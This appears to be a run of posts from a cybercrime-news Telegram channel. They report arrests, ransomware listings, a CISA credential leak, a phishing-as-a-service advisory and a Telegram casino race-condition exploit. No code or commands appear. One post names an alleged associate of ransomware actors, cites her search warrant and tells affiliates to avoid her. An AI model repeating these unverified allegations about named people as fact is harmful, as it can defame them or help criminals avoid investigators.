⚠JUST IN: Apple and Google pushed out the beta for E2EE (End-to-end encrypted) RCS messaging.

Starting the 11th of May, Apple and Google released an update for their latest default messaging apps, which now include end-to-end encrypted RCS (Rich Communication Services) chats between iPhone and Android users.

This update applies for iPhone users, who are running the latest iOS (26.5) and Android users who have the most recent patch of Google Messages. Both parties have to be clients of respective carriers, that provide the service.

Update enables encryption by default, if the requirements are met and is enforced on every new chat made.

@arch

⚠ JUST IN: Suspected Dream Market admin arrested in Germany faces U.S. charges

49-year-old Owe Martin Andresen faces up to 20 years in prison in the U.S. and was arrested in Germany on separate charges. Dream Market operated from 2013 to 2019 and facilitated the sale of massive quantities of illegal drugs before shutting down.

Andresen allegedly used the handle "Speedstepper" to run the marketplace. Prosecutors say he accessed dormant cryptocurrency wallets in late 2022 and laundered over $2 million between August 2023 and April 2025—including buying $1.7 million in gold bars shipped to his home in Germany.

German authorities raided his residence on May 7, 2026, and recovered the gold bars, $23,000 in cash, and evidence of $1.2 million in suspected Dream Market proceeds.

@arch

⚠JUST IN: Interpol dismantles MENA cybercrime ring in Operation Ramz targeting phishing and malware

Interpol published a public statement, that the operation executed in the MENA (Middle East and North Africa) region, was a terrific success and the first-of-its kind. 13 countries in the MENA region took part in the year long investigation.

As of now, 201 arrests have been made public, and 382 other suspects are under investigation. Authorities seized over 8,000 pieces of evidence and 53 servers, that were utilized to uphold crucial infrastructure.

3,867 victims have been identified, and authorities are working on restitutions.

@arch

⚠JUST IN: Netherlands launched a new campaign called "Game Over!?" to weaken cybercrime

Dutch police organized a scheme that involves uploading blurred pictures of known fraudsters onto social media and promising to make their identities public, if they do not turn themselves in within a two week period. The operation was targeting fraudsters, that ran banking helpdesk impersonation, fake police officer and card collector schemes. Main aim was to root out banking fraud, due to the large influx of elderly victims involved.

Police was essentially taunting alleged offenders, promising to plaster their identities around publicly, on social media channels as well as have posters of them up on the streets for everybody to see.

Dutch authorities went through with the plan, as of now: 34 alleged cybercriminals turned themselves in. Revelation also prompted authorities to uncover the identities of 40 other suspects. Six arrests have been confirmed.

Officials also have come out with an age demographic between these perpetrators, the youngest being just 14 years old. The average age being 22 years.

@arch

⚠JUST IN: Researchers found sensitive credentials belonging to CISA (US Cybersecurity Agency) stored in a public GitHub repository

A firm called "GitGuardian" that scans public GitHub repositories for poorly kept secrets, made a discovery regarding CISA's publicly available sensitive logins.

Suggestions indicate, that the scandal originated from a third-party contractor, related to CISA and DHS (Department of Homeland Security), and possibly happened due to human error. The repository was created back in Nov 2025, and has been fully accessible to the public all this time. Over the year, multiple commits have been made to the files within in the repo, one of them being an automated feature that warns the owner of potential leaks.

Bad security led to the following data to be exposed: credentials and passwords for internal infrastructure, logs, AWS tokens and cloud keys. AWS tokens exposed logins to 3 GovCloud servers (AWS environment that is specifically designed for US government).

CISA responded with a public statement saying, that the credentials weren't manipulated in any way, so no citizen data was compromised.

As of now, CISA has made the repository private, denying any further access to possible threat actors.

@arch

⚠JUST IN: Dutch FIOD (Financial crime investigations) seized 800 servers from a bulletproof hosting provider

On May 22, FIOD announced that successful raids involving a server hosting provider "Stark Industries" were carried out.

Stark Industries is a web hosting company, already known within federal agencies for upholding criminal infrastructure and enabling cybercrime/cyberattacks. Stark Industries has been linked to Russian state-sponsored campaigns, by providing financial resources and their hosting infrastructure. These actions led them being sanctioned by the United Kingdom last May, which prompted them to move operations to a Dutch based company.

Stark Industries has also partnered in the past with a Russian hacktivist group, giving them access to much-needed resources, to launch massive DDoS campaigns that targeted major corporations.

FIOD stated that, in their raids, that were conducted in the Netherlands, precisely in Schiphol-Rijk and Dronten, they were able to seize the following: 800 servers, several other devices and records. Two arrests were made, a 57 year old suspect, who led the company and a 39 year old, who owns a company that provided internet services to Stark Industries.

@arch

⚠ JUST IN : John Daghita is appearing this morning before the Indictment Chamber of the Court of Appeal in Basse-Terre, which is set to examine an extradition request. He is suspected of having stolen $46 million in cryptocurrency from the U.S. federal government.

It is alledged that the magistrates have placed their deliberation until May 28th. John Daghita's lawyer plans to file a request for release on bail as early as next week for her client, who is still being held in the Basse-Terre prison.

Do you believe that there could be an outcome where M.Daghita is out on bond?

@arch

⚠️ JUST IN: Former call tracking executives plead guilty for enabling global tech support scam ring

Former CEO Adam Young and former CSO Harrison Gevirtz pleaded guilty to hiding a long-running tech support fraud tied to their company C.A. Cloud Attribution Ltd. They face up to three years in federal prison and fines up to $250,000; sentencing is June 16.

Prosecutors say C.A. Cloud, active from 2017 to April 2022, sold phone numbers, call recordings, routing and call-tracking to customers they knew ran scams. Those customers used fake pop-up warnings, impersonated Microsoft and Apple, pressured victims to pay hundreds for bogus fixes, remotely accessed computers, and in some cases stole data and money.

Rather than report the abuse, the executives allegedly told clients to rotate large pools of phone numbers to dodge complaints and shutdowns, steered sales toward fraudulent businesses, and sometimes brokered call trades. They also ran a Tunisia call center where staff carried out similar scams.

The FBI says the pair profited from schemes that targeted the elderly and vulnerable, leaving many frightened or financially ruined. Related cases include a leader sentenced to seven years after taking over $6 million from about 6,500 elderly victims, and the FBI reported Americans lost at least $2.1 billion to tech support fraud last year based on nearly 48,000 complaints to its Internet Crime Complaint Center.

@arch

⚠️JUST IN: FBI & IC3 warn of PhaaS stealing Microsoft 365 OAuth tokens

The FBI and IC3 published a joint PSA after Kali365, a Telegram marketed Phishing‑as‑a‑Service observed in April 2026, was found automating OAuth Device Authorization phishing to capture Microsoft 365 access. The phishing kit packages the full attack chain: AI-written lures, multilingual templates, dynamic device‑code generation, live cookie capture panels, and affiliate access which makes it easy for low-skill actors to run high‑volume campaigns.

Uses on‑demand device codes and clipboard tricks to remove timing issues, raising success rates.
Automates the full attack chain.
Refresh cookies provide persistent, stealthy access across services without needing passwords.

Requires user interaction (victim must paste the code).
Visible account activity or security alerts, token revocation and conditional access policies can detect or block misuse.
Reliant on OAuth/device‑flow implementations, rate limits and device code policies reduce effectiveness.

@arch

⚠JUST IN: Update related to the credential leak involving CISA (US Cybersecurity Agency)

It has come to light, that even though CISA claimed last week, that they're actively working on securing and replacing leaked secrets; an exposed RSA private key, that could grant an unauthorized user full access with full administrative rights to a GitHub app, which contains the entire CISA-IT GitHub organization with all code repos, was still valid.

Dylan Ayrey, founder of a company "TruffleHog", that works on identifying exposed secrets on GitHub, notified a renowned cybersecurity specialist Brian Krebs, who notified CISA of Ayrey's findings. As of now, CISA has invalidated the leaked RSA private key, but according to Ayrey, CISA has not yet changed the leaked credentials to various other sensitive security infrastructure. Situation is delicate due to the fact, that ill ridden advesaries could've seen CISA's secrets and critical infrastructure months ago.

US Congress has also joined the scandal, demanding answers from CISA's leadership.

@arch

⚠JUST IN: Salvation Army's Canadian operations are being ransomed by Bravox

RaaS (Ransomware-as-a-Service) group known as Bravox listed the ransom notice for Salvation Army's Canadian operations on their blog site.

Bravox is a RaaS group, who started their operations publicly back in January 2026, they originate from a forum called RAMP. Their primary targets are: US-based organizations in healthcare and retail.

Bravox is currently advertising 110.1GB worth of data to be leaked, if needs are not met. Salvation Army has not yet published any official public statements, regarding the situation. Infostealer activity indicates 1 compromised employee, 2 compromised users and 27 third-party employee credentials.

The Salvation Army operates in 134 countries, providing help to the people in need giving shelters, rehabilitation programs and resources for the vulnerable.

@arch

⚠JUST IN: Infamous e-girl "Kenzie" AKA Makenna has been allegedly raided by federal agents.

She was known to be closely associated with Ransomware affiliates such as "Waifu", also known as Alexander "Connor" Riley Moucka, who was arrested in Kitchener, Ontario, on October 30, 2024, at the request of U.S. authorities He is currently in U.S. custody and facing 20 federal charges for his alleged role in massive cyberattacks, data breaches, and extortion schemes, notably known for the Snowflake breach.

It appears that she has gotten her device seized as of April 3rd 2026 (03/04/26), as she is under an on-going investigation due to receiving and spending illegal proceeds from various criminal activities, such as ransom payments or social engineered victim's funds, and spending the dirty funds to pay for VaaS (Violence-as-a-service) to harm other members of the community, through the means of swatting.

The attachments above depict her search warrant, ordered by the court of Kentucky.

This post is to warn about the new wave introduced by federal authorities involving closing in on known suspects and conducting rather quiet arrests, that do not make their way into the media. Most of these apprehensions end with them turning silent informants.

It is advised to stay away from her if you are affiliated with her in any shape, way or form.

@arch

⚠JUST IN: FBI IC3 released an advisory on a group known as "Silent Ransom Group"

Silent Ransom Group (SRG, Luna Moth, Chatty Spider, UNC3753), has been active since 2022, targeting finance, insurance, and healthcare companies, through social engineering attacks. Their playbook usually consists of impersonating IT helpdesk, sending phishing emails, establishing access to unauthorized systems and exporting data via legitimate remote access tools. SRG has also sent individuals in-person to victim corporations and gaining internal access that way. Group has been shifting their scopes onto US-based law firms, as of Spring 2023.

IC3 has called SRG: "Unconventional from different ransomware groups.", due to their unique nature. SRG does not follow the usual route, by relying on traditional ransomware encryption. Instead, they seek swift access to victims' systems, export the data, and extort the companies through threatening to leak the data publicly, or sell it.

Attackers call an employee to social engineer remote access; if that fails they send an operative to plug a device into the victim's machine, then trick the user into imaging/backing it up and use escalated privileges to exfiltrate data via WinSCP or a disguised Rclone.

@arch

⚠JUST IN: Threat Actor Ryan Pepper is allegedly tortured in Dubai Detention

27-year-old threat actor Ryan Pepper, from Kent, United Kingdom has reportedly been held in UAE custody for over 7 months without formal charges or a court appearance.

During his detention, he allegedly suffered severe abuse, including repeated beatings and torture while imprisoned in Sharjah.

According to reports, Pepper managed to smuggle handwritten notes out of prison describing violent treatment and inhumane conditions, even nothing that his teeth were pulled out. His family claims they were left without information on his whereabouts for weeks after his disappearance.

Human rights campaigners are now calling on UK authorities to take stronger action, accusing the UAE of arbitrary detention practices and abuse of foreign nationals. The UK Foreign Office says it is providing consular support and has raised concerns with Emirati officials.

The case has reignited criticism surrounding the UAE’s detention system, with advocacy groups warning travelers about the risks of imprisonment and mistreatment in the country.

It is to note, that according to insider sources, it is alledged that other threat actors are getting similar treatment, notably people involved in the wave of arrests in December 2025, with some notable names tied to the theft in the $243M Genesis Creditor theft from August 2024, as well as other notable threat actors from the community causing well over 8 figures in damages.

Ironically, Dubai has long been viewed online as a safe haven for fraudsters, cybercriminals, and organized scam networks due to weak enforcement, luxury protection culture, and the difficulty foreign agencies face when pursuing suspects operating from the region. Over the past few years, countless figures tied to financial fraud, ransomware, crypto scams, and social engineering operations have openly relocated there believing they were untouchable.

However, recent arrests, detentions, extraditions, and international cooperation efforts suggest that image may slowly be changing. Authorities in the UAE appear to be increasing pressure on certain criminal networks, particularly as global attention surrounding cybercrime and financial fraud continues to grow.

@arch

⚠️ We have introduced a new direct message function so that you guys are able to reach out to us with any questions, stories or tips, as well as support to any questions you may have about any posts.

Our main aim has always been to serve our dear community with quality topics and intriguing articles. We are community oriented, and feel the need to cast news, that are personalized to your liking.

The direct message link can be found by clicking onto our channel's profile, and scrolling to the bottom, revealing a link, where anyone can send us a direct message.

@arch

⚠️ JUST IN: Telegram casino "Unbox" exploited for approximately $130,000 via race-condition vulnerability.

A vulnerability in the Telegram-based casino "Unbox", operated by well-known middleman @nine, was allegedly exploited to convert roughly $120 into nearly $130,000.

According to reports, the attacker automated two API requests against a mines-style game within the same millisecond. While a game round was still active, the attacker triggered a seed reset, because the previous seed had already been revealed before the round was finalized, the attacker was able to determine the outcome tied to the old seed and complete the game with effectively guaranteed winning bets. By repeatedly abusing the race-condition flaw, the attacker reportedly scaled their balance significantly.

After attempting to withdraw the funds, the account was reportedly blacklisted by the platform.

After their withdrawal was blocked, the exploiter publicly criticized the casino and suggested misconduct on its part. The individual later admitted that the funds had been obtained by exploiting a vulnerability in the platform, undermining claims that the incident constituted an exit scam.

We reached out to @nine about the exploit for comment but did not receive a response by publication time.

The incident highlights a broader issue facing many Telegram-based casinos and gambling applications. Security controls, game-state validation, concurrency protections, and backend auditing are often less mature than those found at larger regulated gaming platforms, making race conditions and logic flaws particularly dangerous when real funds are involved.

At the time of writing, there is no evidence that @unbox or it's operator, @nine, conducted an exit scam.

@arch

⚠️JUST IN: Nemesis Market vendor Darren Hughes sentenced to 26+ years for trafficking

39-year-old Darren Hughes, of San Jose, California, has been sentenced to more than 26 years in federal prison after a November 2025 conviction for trafficking fentanyl and methamphetamine through Nemesis Market.

Hughes operated a Nemesis Market storefront that offered free meth samples; after an undercover agent received a free sample, Hughes sold meth and fentanyl pills to the agent on five separate occasions in 2023. He was arrested on June 28, 2023, after arranging another sale; officers found ~672 grams of methamphetamine and a loaded 9mm “ghost gun” in his vehicle.

Prosecutors say Hughes exploited the dark web to distribute drugs and that law enforcement investigations into Nemesis Market began in October 2022 and culminated in the market’s shutdown in March 2024. At its peak Nemesis hosted hundreds of thousands of user accounts, processed hundreds of thousands of orders (including thousands for opioids and tens of thousands for stimulants), and was dismantled by coordinated German–U.S. actions that seized infrastructure and assets.

Officials from the U.S. Attorney’s Office and IRS-CI emphasized that dark web marketplaces are not beyond law enforcement’s reach and highlighted the ongoing multinational efforts that led to Nemesis Market’s takedown and related prosecutions.

@arch

⚠️JUST IN: Threat actor Ryan Pepper speaks from UAE detention

28 year old Ryan Pepper from Kent, UK, has now been held in Sharjah detention centre for over 7 months without charges. He still does not know what crime he is accused of.

In a secretly recorded voice note, Pepper revealed he and other detainees were forced to sign legal documents in Arabic under threat of having their hands broken. None were given translations.

Pepper and 14 others on his case including 7 British nationals, all in their twenties — allege they were blindfolded, stripped, beaten, sexually assaulted, and psychologically tortured in small rooms where CCTV was turned off. Guards allegedly recorded the assaults and shared them on WhatsApp and Snapchat. Pepper was hospitalized at least once.

Conditions include 30–40 minutes outside his cell per day, months without daylight, constant bright lights preventing sleep, and no drinking water. Detainees believe the food is drugged and only eat commissary items purchased with family money.

British Embassy officials visited Pepper and witnessed his cracked teeth and head bandage, yet the family has been told an investigation could take over a year. His two children, aged 1 and 3, haven’t seen him in over six months.

Radha Stirling, CEO of Detained in Dubai, confirmed a dramatic spike in British citizens reporting torture and arbitrary detention in the UAE, calling Pepper’s case “not an isolated incident.”

@arch